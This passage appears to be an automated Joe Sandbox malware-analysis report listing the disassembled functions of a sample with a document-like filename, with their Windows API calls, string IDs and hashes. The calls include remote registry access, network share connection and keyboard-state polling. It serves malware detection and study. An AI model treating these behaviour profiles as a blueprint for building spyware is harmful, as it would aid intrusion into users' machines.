                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2116804098-3420473620
                                                        • Opcode ID: 79b7ec1df03d8f7f877fe118ded00f3471de73c521a4d3a78764e69c6fb17ef1
                                                        • Instruction ID: 3438010a64ee55d0ac468245d4e5c9d634fda42caf8e27e013d968c43d5c1657
                                                        • Opcode Fuzzy Hash: 79b7ec1df03d8f7f877fe118ded00f3471de73c521a4d3a78764e69c6fb17ef1
                                                        • Instruction Fuzzy Hash: 8551A571900109FACB25FBE4CD4AEEEB779AF14701F108166B505720A1EB7D6F98CBA1
                                                        Function 0074AEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • _memset.LIBCMT ref: 0074AF74
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0074AFA9
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0074AFC5
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0074AFE1
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0074B00B
                                                        • CLSIDFromString.COMBASE(?,?), ref: 0074B033
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0074B03E
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0074B043
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1411258926-22481851
                                                        • Opcode ID: b84fb4a3b2c53a77adb2b3c5eb1482ac50b142f793fb9c5ce14e34c227781952
                                                        • Instruction ID: 22e3a3be37991d1a0f25c3f22b7384e654200a80d6b2c71c8ef6729df58202a5
                                                        • Opcode Fuzzy Hash: b84fb4a3b2c53a77adb2b3c5eb1482ac50b142f793fb9c5ce14e34c227781952
                                                        • Instruction Fuzzy Hash: 47411976C10229EBCF11EFA8DC95DEEB7B8BF04700F404129E911B21A1EB789E45CB90
                                                        Function 00757212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00757226
                                                        • __swprintf.LIBCMT ref: 00757233
                                                          • Part of subcall function 0073234B: __woutput_l.LIBCMT ref: 007323A4
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 0075725D
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00757269
                                                        • LockResource.KERNEL32(00000000), ref: 00757276
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00757296
                                                        • LoadResource.KERNEL32(?,00000000), ref: 007572A8
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 007572B7
                                                        • LockResource.KERNEL32(?), ref: 007572C3
                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00757322
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                        • String ID: L6|
                                                        • API String ID: 1433390588-1450050004
                                                        • Opcode ID: 1ea0c8ef30300c1a99f5a0f702410d8caf9fe1cf980655625bd0aa6da935fc8b
                                                        • Instruction ID: d3de6c23fc4dfe8c2a9a34965f13dc5be229fc5bcaf032512ad84c49199e989e
                                                        • Opcode Fuzzy Hash: 1ea0c8ef30300c1a99f5a0f702410d8caf9fe1cf980655625bd0aa6da935fc8b
                                                        • Instruction Fuzzy Hash: CA31BEB190425AABDB159F60EC89AEF7BB9FF08302F008426FD01D2151E77CD955DAA4
                                                        Function 007583D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0075843F
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00758455
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00758466
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00758478
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00758489
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: 6197c5f907615d7f681011792b8a49903e4d36d9d9a37dedfe8a9dcd835b8fea
                                                        • Instruction ID: e6bef35686193daa2e2fa08d4f0c2275d4ad02fff1ca3f68405b90fa28ba9dcf
                                                        • Opcode Fuzzy Hash: 6197c5f907615d7f681011792b8a49903e4d36d9d9a37dedfe8a9dcd835b8fea
                                                        • Instruction Fuzzy Hash: A011C8A1640159B9D710BBA5CC4AEFF7B7CEB91B00F40442D7811B20C0DEA85E49C9B1
                                                        Function 00758097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • timeGetTime.WINMM ref: 0075809C
                                                          • Part of subcall function 0072E3A5: timeGetTime.WINMM(?,75C0B400,00786163), ref: 0072E3A9
                                                        • Sleep.KERNEL32(0000000A), ref: 007580C8
                                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 007580EC
                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0075810E
                                                        • SetActiveWindow.USER32 ref: 0075812D
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0075813B
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0075815A
                                                        • Sleep.KERNEL32(000000FA), ref: 00758165
                                                        • IsWindow.USER32 ref: 00758171
                                                        • EndDialog.USER32(00000000), ref: 00758182
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: d3cff1a27dee026300921a542503bcf39badbbcc50f9377c93375b9ba03d7923
                                                        • Instruction ID: 85ced2d7928b2dec3d66a0b5186670957ea2b4b8057d3ddd0884fd59097432b0
                                                        • Opcode Fuzzy Hash: d3cff1a27dee026300921a542503bcf39badbbcc50f9377c93375b9ba03d7923
                                                        • Instruction Fuzzy Hash: B221AA70201645BFE7615B61EC49B763B3AF70438AF04821AF905A3261CFBE4D0A8B1B
                                                        Function 007578EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 44c6d5f39d77699ee8016bf8f7899b7975bfa3dc072c1b4bd6184e2c1e9cb836
                                                        • Instruction ID: 0b241d5d7a7855c710de139b386b054d1712a0a31240783f2362ff8f52e60ce2
                                                        • Opcode Fuzzy Hash: 44c6d5f39d77699ee8016bf8f7899b7975bfa3dc072c1b4bd6184e2c1e9cb836
                                                        • Instruction Fuzzy Hash: 7E110571908115ABDB34A770AC4AEDE337CEB05721F004066F84992091EFBCEE85C6A4
                                                        Function 007608D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                        • String ID:
                                                        • API String ID: 3566271842-0
                                                        • Opcode ID: 17001cad1b48132ada953eaba1f8bcf207a941ce19fa499b6de180c3e1e86f9f
                                                        • Instruction ID: 8e913378d8f7c25b989bd003c30930bf8d1368ca0ab2bfdb8e3292a3d357f7b6
                                                        • Opcode Fuzzy Hash: 17001cad1b48132ada953eaba1f8bcf207a941ce19fa499b6de180c3e1e86f9f
                                                        • Instruction Fuzzy Hash: 86711175900219EFDB10DFA4C989ADEB7B9FF49310F048096E90AAB251D778EE41CF94
                                                        Function 0075388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00753908
                                                        • SetKeyboardState.USER32(?), ref: 00753973
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00753993
                                                        • GetKeyState.USER32(000000A0), ref: 007539AA
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 007539D9
                                                        • GetKeyState.USER32(000000A1), ref: 007539EA
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00753A16
                                                        • GetKeyState.USER32(00000011), ref: 00753A24
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00753A4D
                                                        • GetKeyState.USER32(00000012), ref: 00753A5B
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00753A84
                                                        • GetKeyState.USER32(0000005B), ref: 00753A92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: dd4d791fec56e9f4c107c16598a8b007eec691c0d1ab31ddb71dd8afe4080952
                                                        • Instruction ID: 533fc59630f69c0d479e26b357de01f2773a9dfb694ab6d0df6348b80a56c2ba
                                                        • Opcode Fuzzy Hash: dd4d791fec56e9f4c107c16598a8b007eec691c0d1ab31ddb71dd8afe4080952
                                                        • Instruction Fuzzy Hash: 1451FA60A047C869FB35DBA488157EAAFB45F013C5F08858DD9C25A1D2DBDCAB8CC771
                                                        Function 0074FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 0074FB19
                                                        • GetWindowRect.USER32(00000000,?), ref: 0074FB2B
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0074FB89
                                                        • GetDlgItem.USER32(?,00000002), ref: 0074FB94
                                                        • GetWindowRect.USER32(00000000,?), ref: 0074FBA6
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0074FBFC
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0074FC0A
                                                        • GetWindowRect.USER32(00000000,?), ref: 0074FC1B
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0074FC5E
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0074FC6C
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0074FC89
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0074FC96
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 77377e7f76a6263f3f394f5d997d8be9a63b40ad1c90ac843146d4a1317f6611
                                                        • Instruction ID: a1206f42831ab8796884013ff91b168bcfc396de2209040d83832f3fc703c3de
                                                        • Opcode Fuzzy Hash: 77377e7f76a6263f3f394f5d997d8be9a63b40ad1c90ac843146d4a1317f6611
                                                        • Instruction Fuzzy Hash: 67511EB1B00209AFDB18DF69DD95AAEBBBAEB88350F14813DF919D7290D7749D01CB10
                                                        Function 0072B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
                                                        • GetSysColor.USER32(0000000F), ref: 0072B067
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: d362000fe16ed7eb73324ec7a751e06001c0c3f4cd97517da12f634b2c5b2cf7
                                                        • Instruction ID: 4ef5f2fc89285f7c9f39e1a62020444f00f393f3c9272605f4500836f9cf44ea
                                                        • Opcode Fuzzy Hash: d362000fe16ed7eb73324ec7a751e06001c0c3f4cd97517da12f634b2c5b2cf7
                                                        • Instruction Fuzzy Hash: 5C41E531140554AFDB31AF28EC88BBA3B65AB46730F158362FD758B1E1D7388C42DB25
                                                        Function 00757334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                        • String ID:
                                                        • API String ID: 136442275-0
                                                        • Opcode ID: 3d65064538be138d904cac7504cf6c32f3f99f425fb8c2853062c4dd62c6e079
                                                        • Instruction ID: 5ebb930d9acbc3b6d199c088bb102b78029e1977cf55ca1fe8afd893487ac196
                                                        • Opcode Fuzzy Hash: 3d65064538be138d904cac7504cf6c32f3f99f425fb8c2853062c4dd62c6e079
                                                        • Instruction Fuzzy Hash: F44112B290416CAADF25EB50DC45EDE73BCAB48310F5041E6B519A2051EF79AFD8CFA0
                                                        Function 007184A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 007184E5
                                                        • __itow.LIBCMT ref: 00718519
                                                          • Part of subcall function 00732177: _xtow@16.LIBCMT ref: 00732198
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf_xtow@16
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 1502193981-2263619337
                                                        • Opcode ID: e1686458018a66d7ef30157b3b0d2ff48597aed9782e96195b38658f97b1daab
                                                        • Instruction ID: 0e7c1a44b60d1d0e1126784ea47382e3bfa57a94985dbf86a0479769b806efb6
                                                        • Opcode Fuzzy Hash: e1686458018a66d7ef30157b3b0d2ff48597aed9782e96195b38658f97b1daab
                                                        • Instruction Fuzzy Hash: 4841E271600609DBEB24EF78D845EAA77E5BF48310F20446EE549D6292EE3D9A81CB11
                                                        Function 00735C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00735CCA
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        • __gmtime64_s.LIBCMT ref: 00735D63
                                                        • __gmtime64_s.LIBCMT ref: 00735D99
                                                        • __gmtime64_s.LIBCMT ref: 00735DB6
                                                        • __allrem.LIBCMT ref: 00735E0C
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00735E28
                                                        • __allrem.LIBCMT ref: 00735E3F
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00735E5D
                                                        • __allrem.LIBCMT ref: 00735E74
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00735E92
                                                        • __invoke_watson.LIBCMT ref: 00735F03
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                        • Instruction ID: e61018e0e46f10dc9215630f21d56ab00fb0a88badca7cd9b998c4fb77ae874f
                                                        • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                        • Instruction Fuzzy Hash: DC71C971A41B17EBF7149F78CC85BAA73A8AF10724F144239F914DB683E778DA408B90
                                                        Function 007557FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00755816
                                                        • GetMenuItemInfoW.USER32(007D18F0,000000FF,00000000,00000030), ref: 00755877
                                                        • SetMenuItemInfoW.USER32(007D18F0,00000004,00000000,00000030), ref: 007558AD
                                                        • Sleep.KERNEL32(000001F4), ref: 007558BF
                                                        • GetMenuItemCount.USER32(?), ref: 00755903
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0075591F
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00755949
                                                        • GetMenuItemID.USER32(?,?), ref: 0075598E
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007559D4
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007559E8
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00755A09
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
